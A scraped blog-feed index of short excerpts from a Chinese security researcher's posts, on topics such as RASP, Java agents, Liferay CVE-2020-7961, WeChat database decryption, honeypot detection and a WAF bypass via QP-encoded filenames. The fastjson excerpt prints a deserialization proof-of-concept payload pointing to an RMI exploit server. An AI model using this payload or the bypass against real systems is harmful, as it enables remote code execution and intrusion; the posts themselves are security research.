Clik here to view.
Spring MVC MultipartResolver特性-QP编码
今天看Spring的Multipart处理发现一段比较奇怪的代码:奇怪的是Spring为什么会对“=?”、“?=”进行特殊处理?跟进后发现这玩意是QP编码,用来解决邮件内附件编码问题。Spring调用了java mail的api对文件上传的附件文件名称进行了QP编码。既然已知Spring的这个特性,那么某些时候或许就可以通过对文件名称进行编码来绕过传统的waf、cdn的防御了。利用Java...
View ArticleIdea 中使用Groovy 脚本自动生成Entitys类
原生成脚本来自园长:from:http://javaweb.orgimport com.intellij.database.model.DasTable import com.intellij.database.model.ObjectKind import com.intellij.database.util.Case import...
View ArticlePHPdocX7 Source code
====PHPdocX 7 by 2mdc.com==== https://www.phpdocx.com/PHPDOCX is a PHP library designed to dynamically generate reports inWord format (WordprocessingML).The reports may be built from any available...
View ArticleClik here to view.
java Agent 简单学习
前言java.lang.instrument包是Java中来增强JVM上的应用的一种方式,机制是在JVM启动前或启动后attach上去进行修改方法字节码的方式。instrument包的用途很多,主要体现在对代码侵入低的优点上,例如一些监控不方便修改业务代码,但是可以使用这种方式在方法中植入特定逻辑,这种方式能够直接修改JVM中加载的字节码的内容,而不需要在像Spring...
View ArticleClik here to view.
搭建Selenium 集群
引言工作中用到了Selenium作为爬虫去解析网页,发现单机跑慢的要死,所以找了点资料,将官方的Selenium 集群搭建了起来,下面是搭建的过程。环境介绍 系统 jdk环境 selenium版本 安装的浏览器 用途 别名 Centos7 1.8 3.141.59 chrome server Hub Centos7 1.8 3.141.59 chrome node Node1 Centos7...
View ArticleJVM 指令集
指令码 助记符 说明 0×00 nop 什么都不做 0×01 aconst_null 将null推送至栈顶 0×02 iconst_m1 将int型-1推送至栈顶 0×03 iconst_0 将int型0推送至栈顶 0×04 iconst_1 将int型1推送至栈顶 0×05 iconst_2 将int型2推送至栈顶 0×06 iconst_3 将int型3推送至栈顶 0×07 iconst_4...
View ArticleClik here to view.
浅谈RASP技术攻防之基础篇
作者:sky@iiusky目录 目录 引言 一 、什么是RASP? 二、RASP vs WAF 三、国外的RASP 四、国内RASP技术实现进度以及状态 五、各种语言RASP技术实现方式 1、JAVA 2、PHP 3、.NET 4、other 六、举个例子 1. 如何在Java中实现RASP技术 2. 如何在PHP中实现RASP技术 七、RASP技术的其他方面应用场景 代码审计 0day防御...
View ArticleClik here to view.
浅谈RASP技术攻防之实战[环境配置篇]
概述 IDEA开发环境配置 初始化项目 test-struts2模块基本配置 agent模块基本配置 pom.xml包配置 创建MAINFEST.NF文件 maven自动打包配置 创建Agent主要实现代码包...
View ArticleClik here to view.
浅谈RASP技术攻防之实战[代码实现篇]
概述 简易版RASP实现 创建入口类 创建Transform build Agent配置 创建ClassVisitor类 对ProcessBuilder(命令执行)类进行hook用户执行的命令 使用transform对类名进行过滤 创建测试环境 拿到用户所执行的命令 复写visitMethod方法 测试hook用户执行的命令参数是否拿到 总结 参考...
View ArticleClik here to view.
fastjson =< 1.2.47 反序列化漏洞浅析
poc{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://localhost:1099/Exploit","autoCommit":true}}}...
View Article分享一份园长师傅博客日志
grep "is.war" /var/log/nginx/p2j.cn.log |awk '{print $1}' |sort |uniqp2j.zip
View ArticleClik here to view.
CVE-2020-7961 水文一篇
概述Code White发现了多个严重的JSON严重反序列化漏洞,这些漏洞影响Liferay Portal 6.1、6.2、7.0、7.1和7.2版。它们允许通过JSON Web服务API进行未经身份验证的远程代码执行。固定的Liferay Portal版本是6.2 GA6、7.0 GA7、7.1 GA4和7.2 GA2。相应的漏洞是:...
View Articlewin下微信数据库解密,获取已关注公众号信息
解密文件来自于52pojie上的大佬分享,本文只记录解密过程以及如何获取公众号基本信息.https://www.52pojie.cn/forum.php?mod=viewthread&tid=1153671解密过程1、安装Python3.7 32位的版本2、通过pip安装以下依赖pip.exe install pycryptodome pip.exe install psutils...
View ArticleClik here to view.
关于检测web蜜罐利用jsonp获取信息的一些想法
本文首发先知0x00 引言本文讨论出发点为(商业)蜜罐利用js脚本调用jsonp接口的过程与检测&防御手法.本文不提供任何成品插件以及检测,只会提供示例代码.0x01 概述由于最近参与做了一些hw前的演习项目,在这个过程中,时不时有别的攻击队踩了蜜罐导致被防守方反向溯源.之前多多少少了解过几个当前市场的(商业)web蜜罐,知道大致关键技术点如下: 配置jsonp接口信息 配置蜜罐网站信息...
View ArticleResty 记录request&response
问题因为目前写的工具中,采用了Resty作为http 客户端,在调试插件的过程中,需要将request包以及response保存并且打印出来,方便后续对攻击请求的包进行分析。Resty内部有一个方法简单看了下,应该是可以满足此需求的,方法名为,存在与/github.com/go-resty/resty/v2@v2.3.0/client.go:898 outputLogTo ()...
View ArticleClik here to view.
WappalyzerParse Golang 解析库
开源一个Wappalyzer指纹库解析的Golang库,目前暂不支持识别,只支持解析指纹库。后续有时间将补充识别功能。https://github.com/iiiusky/WappalyzerParse可以输出json结果以及直接使用结构体。输出的json大致如下格式 ……………… { "name": "Loja Integrada", "slug": "loja-integrada",...
View ArticleClik here to view.
golang发送http raw原始包
群里面小伙伴讨论到了这个问题,之前自己写工具的时候有过这个需求,也想看看怎么解决这个问题,一直忙其他时间没顾得上看,正好蹭这个机会顺便看看,此代码仅作为示例,可能还存在未知的若干坑,需要用到生产环境什么的,还是要自己改改。/* Copyright © 2020 sky sky@03sec.com Licensed under the Apache License, Version 2.0 (the...
View Article